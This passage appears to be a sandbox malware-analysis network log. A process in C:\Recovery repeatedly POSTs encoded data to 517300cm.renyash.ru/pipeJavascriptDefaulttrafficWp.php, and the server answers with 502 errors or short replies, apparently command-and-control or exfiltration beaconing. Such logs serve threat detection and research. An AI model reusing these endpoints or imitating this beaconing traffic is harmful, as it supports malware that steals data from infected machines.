Jan 9, 2025 18:12:31.788153887 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:33.069190979 CET	804	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FV4mDhXDcH3Mdyrkx5btzEgCP8FWJp7gs1dZYatadu3K5IHGBbqwqrHLKg2bS0XirTncixqur%2BdBwmP90r8zLXwmeO0pn7au%2FjZKbXoavgUxV11XhoBsC458i3fW6zqPRuSA0IaV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d7e1b338ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10430&min_rtt=1984&rtt_var=17637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=20990&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:33.200278044 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:33.550153017 CET	1012	OUT	Data Raw: 50 51 5b 58 58 46 50 50 59 58 51 54 5b 50 57 57 5f 53 58 5e 52 58 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ[XXFPPYXQT[PWW_SX^RXZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )-_!,"]?3+;3X#;]* 5==V22+Z4/ +'\"/Y.4
Jan 9, 2025 18:12:33.664176941 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:33.712440014 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:34.065577030 CET	1292	OUT	Data Raw: 55 52 5b 5f 58 40 55 57 59 58 51 54 5b 57 57 53 5f 52 58 55 52 52 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR[_X@UWYXQT[WWS_RXURRZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z >3^7==U?874/+?5=%V%3.%7[ 7]('\"/Y.(
Jan 9, 2025 18:12:34.165041924 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:34.356618881 CET	989	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:34 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdwsC%2FWubNglNDeBMcSMFBrX%2BpN8qDId%2FDudgO2nT57J5%2B%2BunWout4eYdhMq9yZSrAWraOo0v9F9%2FkgtvrCtH%2BLPUFe%2Bzvg0l4af13oyDhu0mkZQ5z9ERWnpx3RU5i3gJcTe2JDL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60d8d49017ca8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4304&min_rtt=2177&rtt_var=5070&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=76065&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:33.829931021 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:34.175106049 CET	1012	OUT	Data Raw: 55 57 5e 58 58 40 55 5e 59 58 51 54 5b 51 57 53 5f 57 58 55 52 5c 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UW^XX@U^YXQT[QWS_WXUR\ZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *3#Z.>\-877=9 5!V%0&2;+Z4+:'\"/Y.0
Jan 9, 2025 18:12:34.332153082 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:34.583226919 CET	803	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0kz%2Bsej787Vk4vSjeinmufeLuTTw6CDIZBf5YTYAw%2FxtytXvYhAe5O73rA0dLFQyCseFGE9axVOee8WDQLGJhYIYwVgX3Ob3QpzDhqUA2YIYm0KnU65rwanC7P8YniHZ5ltcy7j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d8e4c968ccc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3242&min_rtt=1961&rtt_var=3299&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=119525&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:34.707998037 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:35.065736055 CET	1012	OUT	Data Raw: 55 50 5e 58 58 47 50 53 59 58 51 54 5b 50 57 56 5f 55 58 5b 52 58 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UP^XXGPSYXQT[PWV_UX[RXZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#* 4<))07Y;"%/Z+6=T20W%$ #<:'\"/Y.4
Jan 9, 2025 18:12:35.171358109 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:35.380691051 CET	978	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:35 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3pQdDM1PXwY0vGmokWIzVbelrNtET1jHnQUyv%2FDUx5F7QLStcVHZ7UI04Vnyjie5xMGXPQQc6Uo5Gd48%2BWAvUfuuWyQ8DHVCm9JaTlxedDedE0qgvKS3OdzIXdMecW4iiUlcI4p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60d938fde180d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7656&min_rtt=1951&rtt_var=12143&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=30674&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:35.502809048 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:35.862447977 CET	1012	OUT	Data Raw: 55 54 5e 5c 58 43 50 52 59 58 51 54 5b 57 57 5d 5f 55 58 5a 52 59 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UT^\XCPRYXQT[WW]_UXZRYZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[="4:> ;X,(04,)\,S6"1 9W17X ?<*'\"/Y.(
Jan 9, 2025 18:12:35.956084013 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:36.192491055 CET	985	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:36 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TAZILwxsnvzyO8PYtgNX61KGQ2%2B%2FD%2BuTms03npoMbGJvHgXl5bbXCNxyZ9VM7dBxEgyOQaeusTkSQXJMF3QvFXtKST2G%2BeSmfYl%2FvJZPppsLq%2FI8mFQgFhajvSHTOaG08WMk0krO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60d987f1fc329-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4611&min_rtt=1717&rtt_var=6433&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=58691&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:36.317133904 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:36.674880981 CET	1012	OUT	Data Raw: 50 54 5e 59 5d 45 55 50 59 58 51 54 5b 57 57 5d 5f 57 58 5f 52 58 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT^Y]EUPYXQT[WW]_WX_RXZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Y=X4<*7X,?4+>:35.=S&#"24 ;Y(:'\"/Y.(
Jan 9, 2025 18:12:36.814330101 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:37.030683994 CET	985	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:36 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TkKrRuw2%2BoSc%2Be7ctti%2Bl7t3SsP4AHcpvWYm%2BNsNr2Cd9IzgJ24BRQLfAtprpf4NxlSr7B3yw9C9rBcVuQXf51NCBrO10hIfybbsyai%2FIvft73hVNlJlwK%2FKdNElozX8CvewmkBO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60d9dda10c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3970&min_rtt=2426&rtt_var=3999&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=98748&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:37.168070078 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:37.518651962 CET	1012	OUT	Data Raw: 50 55 5e 58 58 41 55 52 59 58 51 54 5b 53 57 52 5f 51 58 5e 52 5b 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU^XXAURYXQT[SWR_QX^R[ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X=5_!/=#88(34;]>:<U!.)%39%;Y#/++'\"/Y.8
Jan 9, 2025 18:12:37.640132904 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:37.837208033 CET	982	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:37 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JHgxgQBsz5ZBJAidoQCVNCdwEkJI5mC1QasW2iCOL4%2FIGo86dPo1t2FQaN3a31i%2BdrHgrjKlKPYKhR11ap8P3A4weH6ChHs3PCrswVya1hrr6bl4ik49DVCPPWS%2BqvB96ur%2Bt31X"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60da2ff2915cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7676&min_rtt=1672&rtt_var=12636&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=29370&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:37.961899996 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:38.315876961 CET	1012	OUT	Data Raw: 55 53 5b 59 5d 40 55 51 59 58 51 54 5b 50 57 53 5f 54 58 5f 52 52 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: US[Y]@UQYXQT[PWS_TX_RRZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z =5]4%>7;8 +^)*(V"--V%&$;44<'\"/Y.4
Jan 9, 2025 18:12:38.434214115 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:38.681319952 CET	810	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UeG0TdZUY5U4dhHHeWacJugJDX0ZOqDbnoYKFaLAr4gE6JGq%2BbD%2Biuh0DJbXpoM%2BOZBzEdUDGFEytKrVo4WuN7fWwq3qYMDExdLVOuJE0DB3y9kKt%2F%2BjjIrXEt3PPBWXeJwx%2FHYZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60da7ee9f43e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4496&min_rtt=1656&rtt_var=6302&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=59877&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:38.812558889 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:39.159231901 CET	1012	OUT	Data Raw: 50 55 5b 5f 58 49 55 5e 59 58 51 54 5b 53 57 50 5f 51 58 5f 52 5b 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU[_XIU^YXQT[SWP_QX_R[ZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^=& ,:=U8/8#$)*(!)R20"&;^4/('\"/Y.8
Jan 9, 2025 18:12:39.273895979 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:39.370022058 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:39.721621990 CET	1292	OUT	Data Raw: 50 55 5b 54 58 42 55 55 59 58 51 54 5b 5c 57 51 5f 53 58 54 52 5c 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU[TXBUUYXQT[\WQ_SXTR\ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z %7=#3Y;8#%?^>8W6=U21('[#/,?:'\"/Y.
Jan 9, 2025 18:12:39.867711067 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:40.044972897 CET	986	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 09 Jan 2025 17:12:40 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CWwxILt1SjK8Me0H%2FWc2wk3Q5heuQUnjJ5j42%2F6WJzmq9I6XWm%2Fl%2FIeekHObASWgLKzGr3LIEucCariMqHLWWwuSfRF%2Fdi0OnzTzkBUcpw1t18nZU2w20Wjit%2FcYLdmPyXxyKJod"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ff60db0d95c5e7f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2493&min_rtt=1682&rtt_var=2253&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=178615&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49769	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:39.492697954 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
